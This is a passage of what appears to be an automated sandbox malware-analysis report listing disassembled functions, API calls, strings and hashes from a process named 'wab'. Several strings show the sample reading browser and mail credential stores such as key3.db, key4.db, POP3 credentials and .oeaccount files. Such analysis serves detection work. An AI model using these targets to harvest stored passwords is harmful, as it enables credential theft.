                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040378E
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004037A4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                                                                                                                                                                                          • String ID: %s@gmail.com
                                                                                                                                                                                                                          • API String ID: 500647785-4097000612
                                                                                                                                                                                                                          • Opcode ID: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
                                                                                                                                                                                                                          • Instruction ID: 72ede288a24c3b6660e37d3abac1967f853eec84a0165e1bcd054a17ec7f23cd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09406eb24e79600c9d4883016bab03a37dcb4fc957deefa4a0a4f4140eb3a03a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F21ABF290411C6AEB11DB54DCC5FDAB7BCAB54308F0445AFF609E2181DA789B888B65
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409239
                                                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00409244
                                                                                                                                                                                                                          • GetWindowTextA.USER32(?,?,00001000), ref: 00409257
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040927D
                                                                                                                                                                                                                          • GetClassNameA.USER32(?,?,000000FF), ref: 00409290
                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 004092A2
                                                                                                                                                                                                                            • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                                                          • API String ID: 3411445237-4169760276
                                                                                                                                                                                                                          • Opcode ID: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
                                                                                                                                                                                                                          • Instruction ID: a0e2247af9db09d92512eaab276e72a1f93a19cb85935bad7b90667d70954a25
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0148a07d43ffd720cfa84905c97652f9f91ed7e1207943edf04fbd1bb2dbc290
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32110A728050187FEB119754DC41EEB77ACEF55301F0000FBFA04E2142EAB48E848B64
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A1A
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A2D
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A42
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A5A
                                                                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 00405A76
                                                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00405A89
                                                                                                                                                                                                                            • Part of subcall function 00405723: GetDlgItem.USER32(?,000003E9), ref: 00405731
                                                                                                                                                                                                                            • Part of subcall function 00405723: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405746
                                                                                                                                                                                                                            • Part of subcall function 00405723: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405762
                                                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AA1
                                                                                                                                                                                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BAD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Item$DialogMessageSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2485852401-0
                                                                                                                                                                                                                          • Opcode ID: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
                                                                                                                                                                                                                          • Instruction ID: 8242765b3035aad42ded22ad072fa167e05c4db834e8c53cb5a522b966aec9bd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6705b758d8a8385fcf126e2abef302c8a68af69db22d8c06dbb4b6141a6eddaf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC619E70200A05AFDB21AF25C8C6A2BB7A5FF44724F00C23AF955A76D1E778A950CF95
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B138
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B16D
                                                                                                                                                                                                                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B1A2
                                                                                                                                                                                                                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B1BE
                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0040B1CE
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040B202
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0040B205
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B223
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3642520215-0
                                                                                                                                                                                                                          • Opcode ID: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
                                                                                                                                                                                                                          • Instruction ID: 035281c2cfb68a6c78eb86e81ad7e7fbca9e62364f8fd823d381b3cb5a7ebbdd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b8b596084a258e6a3d6c587c6e164043eee07433b393cce24ea64cb7095e9ca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7318175280708BFFA316B709C47FD6B795EB48B01F104829F3856A1E2CAF278909B58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2313361498-0
                                                                                                                                                                                                                          • Opcode ID: 6f0e433ce69856a90d638de5f69032b71c8054c54d3c4ca0034aaabced9ba3f5
                                                                                                                                                                                                                          • Instruction ID: 8a5161a197c3c11310b51994d494e99affbcf27179d68dd4cd1e15cf4b4d4d3b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f0e433ce69856a90d638de5f69032b71c8054c54d3c4ca0034aaabced9ba3f5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0431B471500605AFEB249F69C845D2AF7A8FF043547148A3FF219E72A1DB78EC508B54
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                                                          • String ID: C@$key3.db$key4.db
                                                                                                                                                                                                                          • API String ID: 581844971-2841947474
                                                                                                                                                                                                                          • Opcode ID: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
                                                                                                                                                                                                                          • Instruction ID: 276f595f6d9fb14d306b90d89522efda4e53a8973e3769554d2ee0aec37c6aae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5494ad0edafd44481aca6acbbe86219ad8b07e707f9afed040af0c0a0aebaa6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D21F9729041196ADF10AA66DC41FCE77ACDF11319F1100BBF40DF6091EE38DA958668
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040B88E
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040B8A4
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040B8B7
                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000003), ref: 0040B8D4
                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B8F1
                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B911
                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040B938
                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0040B941
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2126104762-0
                                                                                                                                                                                                                          • Opcode ID: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
                                                                                                                                                                                                                          • Instruction ID: cf9ea3ecf4623016fd9dc3f5f3f1318dd3ce101ba80f5eccba740e206150479f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6309ff644c12743b91cf70e9e807ca9d204e09485dec5c7f95147756245f13c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F221C276A00609FFDF118FA8DD89FEEBBB9FB08700F104065FA55A2160C7716A519F24
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00407076
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 0040707C
                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0040708A
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040709C
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004070A5
                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,004012E4), ref: 004070AE
                                                                                                                                                                                                                          • GetWindowRect.USER32(004012E4,?), ref: 004070BB
                                                                                                                                                                                                                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407100
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1999381814-0
                                                                                                                                                                                                                          • Opcode ID: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
                                                                                                                                                                                                                          • Instruction ID: 4d379cb21657894a0e11cf9a22620d5233689a1bec75a9944306807f4dd79964
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f21f5323b7ceedafff5760536b34980224d30b32341e91405141b8b8f897059
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F11B735E00619AFDF108FB8CC49BAF7F79EB45351F040135EE01E7291DA70A9048A91
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                                                          • API String ID: 1297977491-3883738016
                                                                                                                                                                                                                          • Opcode ID: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
                                                                                                                                                                                                                          • Instruction ID: fc76bc8343265493366407fdb1c4d707e5d8df4650a3499163c8513785776b89
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec180b53c73d386f260fbd60f4e29b72e3bb9c2a6b5e225ae3417af3491c72e6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64128B71A04629DFDB14CF69E481AADBBB1FF08314F54419AE805AB341D738B982CF99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                                                          • String ID: user_pref("
                                                                                                                                                                                                                          • API String ID: 765841271-2487180061
                                                                                                                                                                                                                          • Opcode ID: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
                                                                                                                                                                                                                          • Instruction ID: 5a65487526c3994ab00424e18f338503154a615df115d4cfef8f26f9df640fc7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a1adde69f0e08c2e228f59276f9fb0b6105cf7cc96dfcb17d977d75f3f89509
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F419AB6904118AEDB10DB95DC81FDA77AC9F44314F1042FBE605F7181EA38AF498FA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405813
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 0040582C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 00405839
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405845
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004058AF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001019,?,?), ref: 004058E0
                                                                                                                                                                                                                          • SetFocus.USER32(?), ref: 00405965
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4281309102-0
                                                                                                                                                                                                                          • Opcode ID: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
                                                                                                                                                                                                                          • Instruction ID: b1c021a56b4f7756f2b42baa300122e183270d3e6e7f1cb1ff0d1441efe58172
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 876f99dafb0e6a95d69d5b7461b0350726d0b63ba9d27f7b5ed0e67933d6ba92
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98411BB5D00109AFEB209F95DC81DAEBBB9FF04354F00406AE914B72A1D7759E50CFA4
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                            • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040A65B
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040A67D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                          • API String ID: 1631269929-4153097237
                                                                                                                                                                                                                          • Opcode ID: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                                                                                                                                                                                                          • Instruction ID: 832b2c653fc05485a7f242a7eb3c8d8175a8ee497f4c95e58b3f18e695e9ea43
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a1c5f3df8c0410e4819bffe23f535fd28423f127cd07168cb4d0992b4b9d367
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE31AE31900218AFDF15DF94C8869DE7BB5FF45320F10416AFD11BB292DB76AA51CB84
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                            • Part of subcall function 00408FB1: _itoa.MSVCRT ref: 00408FD2
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                          • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                            • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408ACD
                                                                                                                                                                                                                            • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408AEB
                                                                                                                                                                                                                            • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B09
                                                                                                                                                                                                                            • Part of subcall function 00408AA5: ??2@YAPAXI@Z.MSVCRT ref: 00408B19
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408B3B
                                                                                                                                                                                                                          • strings, xrefs: 00408B98
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                                                          • API String ID: 4036804644-4125592482
                                                                                                                                                                                                                          • Opcode ID: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                                                                                          • Instruction ID: 2fb35d0cb8d6515d264437a76ba5de351b7eb647a908b3ccb3b2e5853623431c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ef5bdd7b6553c1411f0866e16a237609f5efe4191e7d453619a5ad3a1a82c98
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F3136B95003019FEB149B18EE40E323776EB59346B14443EF845A72B3DB39E815CB5C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E84
                                                                                                                                                                                                                            • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00408018,?,000000FD,00000000,00000000,?,00000000,00408018,?,?,?,?,00000000), ref: 00407F1F
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,00000000,759CE430,?), ref: 00407F2F
                                                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                                                          • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                                                          • API String ID: 524865279-2190619648
                                                                                                                                                                                                                          • Opcode ID: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                                                                                          • Instruction ID: 2c282e6ff88bd57be97cdb9cd65414afbc0c2375aa853475002addcb7488d922
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb8a79189eebe21ea9a309b84d13f13660712c6c97ce44d04bc2eb4e66ed4208
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75316075A4025DAFDB11EB69CC81AEEBBBCEF45314F0080B6FA04A3141D6789F498F65
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                                          • API String ID: 2300387033-3849865405
                                                                                                                                                                                                                          • Opcode ID: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                                                                                                                                                                                                          • Instruction ID: 102fedc8b068d714547c44678b24ea6bae60c59159463c21af6927f9d555436f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99e79691bf6533de20a974ac65a5fcf95ef7575eddab1868be2d8be4df739519
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8210F71108380AFE7108F61D889A5FB7E8FB85344F04093FF684A6282E779DD048B5A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                                                          • String ID: %s (%s)
                                                                                                                                                                                                                          • API String ID: 3756086014-1363028141
                                                                                                                                                                                                                          • Opcode ID: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                                                                                                                                                                                                          • Instruction ID: 49fd0969a141bf365c85b2e85b726abfc67c7a4f8a3ab277a670c68284d415ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4357e9335d32c2bf08e92843452a3ff925627b6c59b5d6ec26037838f45d6104
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A1193B1800118AFEB21DF59CD45F99B7ACEF41308F008466FA48EB106D275AB15CB95
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,.8D,00443752,?,?,*.oeaccount,.8D,?,00000104), ref: 0044369D
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004436AF
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004436BE
                                                                                                                                                                                                                            • Part of subcall function 004072EF: ReadFile.KERNEL32(00000000,?,004436D1,00000000,00000000,?,?,004436D1,?,00000000), ref: 00407306
                                                                                                                                                                                                                            • Part of subcall function 00443546: wcslen.MSVCRT ref: 00443559
                                                                                                                                                                                                                            • Part of subcall function 00443546: ??2@YAPAXI@Z.MSVCRT ref: 00443562
                                                                                                                                                                                                                            • Part of subcall function 00443546: WideCharToMultiByte.KERNEL32(00000000,00000000,004436E8,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004436E8,?,00000000), ref: 0044357B
                                                                                                                                                                                                                            • Part of subcall function 00443546: strlen.MSVCRT ref: 004435BE
                                                                                                                                                                                                                            • Part of subcall function 00443546: memcpy.MSVCRT ref: 004435D8
                                                                                                                                                                                                                            • Part of subcall function 00443546: ??3@YAXPAX@Z.MSVCRT ref: 0044366B
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004436E9
